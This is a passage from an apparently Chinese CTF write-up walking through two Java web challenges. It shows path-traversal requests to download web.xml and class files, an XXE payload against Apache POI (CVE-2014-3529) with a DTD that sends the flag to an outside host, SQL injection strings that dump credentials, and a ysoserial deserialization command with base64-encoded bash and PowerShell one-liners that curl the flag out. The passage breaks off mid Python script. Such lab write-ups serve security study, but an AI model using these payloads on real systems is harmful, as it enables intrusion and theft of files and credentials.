border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/webapps/file_in_java.war</code>会提示<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">您要下载的资源已被删除!</code>，所以还是老实fuzz路径寻找tomcat所在的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/usr/local/tomcat/</code>目录并下载<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">web.xml</code>来获取路径信息：<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/file_in_java/DownloadServlet?filename=../../../../../../../../../../usr/local/tomcat/webapps/file_in_java/WEB-INF/web.xml</code></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">从web.xml 中可以得知包名为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">cn.abc.servlet</code>，由此便可结合servlet名，构造出能下载到相应字节码文件的路径</p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;margin-bottom: 16px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;color: rgb(36, 41, 46);text-align: start;"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;background: initial;border-radius: 3px;word-break: normal;border-width: 0px;border-style: initial;border-color: initial;display: inline;overflow: visible;line-height: inherit;overflow-wrap: normal;">/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/UploadServlet.class<br/>/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/DownloadServlet.class.class<br/>/usr/local/tomcat/webapps/file_in_java/WEB-INF/classes/cn/abc/servlet/ListFileServlet.class<br/></code></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">安利一个集成了多种Java反编译引擎的网站：Decompilers online，反编译后看下代码逻辑</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">http:<span class="code-snippet__comment">//www.javadecompilers.com/</span></span></code></pre></section><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.16640625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=0259eff1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGaKaL0VAUx0sxeScmM4mGVsja6mv7h8SXiceJ63X7Ab7Dn0Q8thPs4eQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">DownloadServlet</code>如果发现要下载的文件名包含<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">flag</code>则会返回<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">禁止读取</code>，<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">UploadServlet</code>会调用<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">POI</code>库解析以<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">excel-</code>开头、<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">xlsx</code>为后缀的文件<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.33643122676579923" data-s="300,640" style="" data-type="png" data-w="1076" src="https://wechat2rss.xlab.app/img-proxy/?k=3635cd84&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGTG9fM2Fl4y7zSbAmZsraTeP4lYSyenrWYjAooNwhtGOtPADibh6icP7w%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">搜索org.apache.poi vuln，可以利用CVE-2014-3529读取flag文件，直接新建一个<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">[Content_Types].xml</code>文件，压缩为zip格式后将文件名改为形如<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">excel-xxx.xlsx</code>的格式</p><section class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"><li></li></ul><pre class="code-snippet__js" data-lang="javascript"><code><span class="code-snippet_outer">https:<span class="code-snippet__comment">//xz.aliyun.com/t/7272#toc-7</span></span></code></pre></section><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;">&lt;?<span style="box-sizing: border-box;color: rgb(34, 134, 58);">xml</span><span style="box-sizing: border-box;color: rgb(111, 66, 193);"> version</span>=<span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#34;</span>1.0<span style="box-sizing: border-box;">&#34;</span></span>?&gt;<br/>&lt;!<span style="box-sizing: border-box;color: rgb(34, 134, 58);">DOCTYPE</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">ANY</span>[<br/>&lt;!<span style="box-sizing: border-box;color: rgb(215, 58, 73);">ENTITY</span> % <span style="box-sizing: border-box;color: rgb(0, 92, 197);">file</span><span style="box-sizing: border-box;color: rgb(215, 58, 73);"> SYSTEM </span><span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#34;</span>file:///flag<span style="box-sizing: border-box;">&#34;</span></span>&gt;<br/>&lt;!<span style="box-sizing: border-box;color: rgb(215, 58, 73);">ENTITY</span> % <span style="box-sizing: border-box;color: rgb(0, 92, 197);">remote</span><span style="box-sizing: border-box;color: rgb(215, 58, 73);"> SYSTEM </span><span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#34;</span><a href="http://公网地址/xxe.dtd" target="_blank">http://公网地址/xxe.dtd</a><span style="box-sizing: border-box;">&#34;</span></span>&gt;<br/><span style="box-sizing: border-box;color: rgb(0, 92, 197);">%remote;</span><br/><span style="box-sizing: border-box;color: rgb(0, 92, 197);">%all;</span><br/>]&gt;<br/>&lt;<span style="box-sizing: border-box;color: rgb(34, 134, 58);">root</span>&gt;<span style="box-sizing: border-box;color: rgb(0, 92, 197);">&amp;send;</span>&lt;/<span style="box-sizing: border-box;color: rgb(34, 134, 58);">root</span>&gt;</pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">在能访问到的公网地址处放入<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">xxe.dtd</code></p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;">&lt;!ENTITY % all &#34;&lt;!ENTITY send SYSTEM &#39;<a href="http://WebLog/?%file;" target="_blank">http://WebLog/?%file;</a>&#39;&gt;&#34;&gt;</pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">此时直接上传<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">excel-xxx.xlsx</code>即可在WebLog平台收到利用XXE读到的flag</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.7416073245167853" data-s="300,640" style="" data-type="png" data-w="983" src="https://wechat2rss.xlab.app/img-proxy/?k=2292b376&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGIMUvWVxvwAsTonIXDzISNPK4ibXqwibicPWBllIfwUjIjVBI1wRLvRtBQ%2F640%3Fwx_fmt%3Dpng"/></p><h2 style="box-sizing: border-box;margin-top: 24px;margin-bottom: 16px;font-weight: 600;font-size: 1.5em;line-height: 1.25;padding-bottom: 0.3em;border-bottom: 1px solid rgb(234, 236, 239);color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><svg viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg>think_java</h2><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">考察Java的swagger-ui接口泄漏、SQL注入、反序列化</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">给了部分字节码文件，反编译后看一下代码<span style="font-size: 0px;"></span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.670957361222848" data-s="300,640" style="" data-type="png" data-w="1243" src="https://wechat2rss.xlab.app/img-proxy/?k=45f6c461&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG12ia0pmPV7FVl64RXR5ORnkTF9I3ffstEeGakNgeyIHpAumwaQicK1hA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">可以看到用了<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">swagger-ui</code>，继续跟进<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/sqlDict</code></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.7025691699604744" data-s="300,640" style="" data-type="png" data-w="1012" src="https://wechat2rss.xlab.app/img-proxy/?k=b037bbf8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG4YewEjTbIy5oFRXmZ6icGeTyn7cdaBGMSVg1hAfmknEwBGicrnlwbBibg%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">dbName</code>为<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">myapp</code>，同时发现SQL拼接存在注入</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.315625" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=46b6e4ec&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGJib6B63ictMWxgXd3U37Js37MF2pFMAVmdkNOfJrVUfnem7cZMDg8nbg%2F640%3Fwx_fmt%3Dpng"/></p><p style="text-align: center;"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/swagger-ui.html#/test</code>可以方便地发起请求，抓包后尝试通过SQL注入获取信息，注意这里的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">#</code>或<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">?</code>仅起填充分隔作用</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><img class="rich_pages js_insertlocalimg" data-ratio="0.25390625" data-s="300,640" style="text-align: center;white-space: normal;" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=9afd0c41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGKQOOJEYLNiaACPUc0WPr1IouLickLOfOrcpRYHAbMIPJbCYQNVXWanKw%2F640%3Fwx_fmt%3Dpng"/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;">dbName<span style="box-sizing: border-box;color: rgb(215, 58, 73);">=</span>myapp<span style="box-sizing: border-box;color: rgb(106, 115, 125);"><span style="box-sizing: border-box;">#</span>&#39; union select user()--+</span><br/>dbName<span style="box-sizing: border-box;color: rgb(215, 58, 73);">=</span>myapp?a<span style="box-sizing: border-box;color: rgb(215, 58, 73);">=</span><span style="box-sizing: border-box;color: rgb(0, 92, 197);">1</span><span style="box-sizing: border-box;color: rgb(3, 47, 98);"><span style="box-sizing: border-box;">&#39;</span> union select group_concat(id,name,pwd) from user--+</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);"></span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">{</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;password&#34;: &#34;admin@Rrrr_ctf_asde&#34;,</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;username&#34;: &#34;admin&#34;</span><br/><span style="box-sizing: border-box;color: rgb(3, 47, 98);">}</span></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">利用拿到的一组帐号密码通过swagger中泄漏的<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/common/user/login</code>登录后，会得到一段token</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.3738095238095238" data-s="300,640" style="" data-type="png" data-w="1260" src="https://wechat2rss.xlab.app/img-proxy/?k=17e3df53&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksG4icqCrv0AY3lLPe5m2BfbNDLbTecvzc4waMEiaX0icuVWaG6ghtMYxuBw%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;margin-bottom: 16px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;color: rgb(36, 41, 46);text-align: start;"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;background: initial;border-radius: 3px;word-break: normal;border-width: 0px;border-style: initial;border-color: initial;display: inline;overflow: visible;line-height: inherit;overflow-wrap: normal;">{<br/>  &#34;Accept&#34;: &#34;*/*&#34;,<br/>  &#34;Authorization&#34;: &#34;Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu&#34;<br/>}<br/></code></pre><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.4953125" data-s="300,640" style="" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=12eb2f36&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FbNibSwNU98ibicNjKA1b5tW1N8DTXCrTksGHst06dyfhbuSvBW1psJ65Oh0LbUhYU1uzT16PLCreLwZ2GmhbSTotA%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">Java环境下<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">rO0AB</code>开头的数据优先猜测为序列化数据的Base64编码，<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">aced</code>开头则优先猜测为hex编码，且这段数据可以被<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">/common/user/current</code>解析，所以考虑打反序列化，先对命令编码一下渡劫<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">Runtime.getRuntime().exec()</code>的坑</p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><span style="background-color: rgba(27, 31, 35, 0.05);font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;"></span></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);"><code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">java -jar ysoserial.jar ROME &#39;bash -c {echo,Y3VybCBodHRwOi8vV2ViTG9nL2BjYXQgLypmbGFnKmA=}|{base64,-d}|{bash,-i}&#39; &gt; payload.bin</code></p><p style="box-sizing: border-box;margin-bottom: 16px;color: rgb(36, 41, 46);font-family: -apple-system, system-ui, &#34;Segoe UI&#34;, Helvetica, Arial, sans-serif, &#34;Apple Color Emoji&#34;, &#34;Segoe UI Emoji&#34;;font-size: 16px;text-align: start;white-space: normal;background-color: rgb(255, 255, 255);">附PS版：<code style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;padding: 0.2em 0.4em;background-color: rgba(27, 31, 35, 0.05);border-radius: 3px;">powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YwB1AHIAbAAgAGgAdAB0AHAAOgAvAC8AVwBlAGIATABvAGcALwBgAGMAYQB0ACAALwAqAGYAbABhAGcAKgBgAA==</code></p><pre style="box-sizing: border-box;font-family: SFMono-Regular, Consolas, &#34;Liberation Mono&#34;, Menlo, monospace;font-size: 13.6px;overflow-wrap: normal;padding: 16px;overflow: auto;line-height: 1.45;background-color: rgb(246, 248, 250);border-radius: 3px;word-break: normal;"><span style="box-sizing: border-box;color: rgb(215, 58, 73);">import</span> <span style="box-sizing: border-box;">base64</span><br/><span style="box-sizing: border-box;">filei</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">open</span>(<span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;payload.bin&#34;</span>, <span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;rb&#34;</span>)<br/><span style="box-sizing: border-box;">fileo</span> <span style="box-sizing: border-box;color: rgb(0, 92, 197);">=</span> <span style="box-sizing: border-box;color: rgb(111, 66, 193);">open</span>(<span style="box-sizing: border-box;color: rgb(3, 47, 98);">&#34;payload.txt&#34;</span>, <span 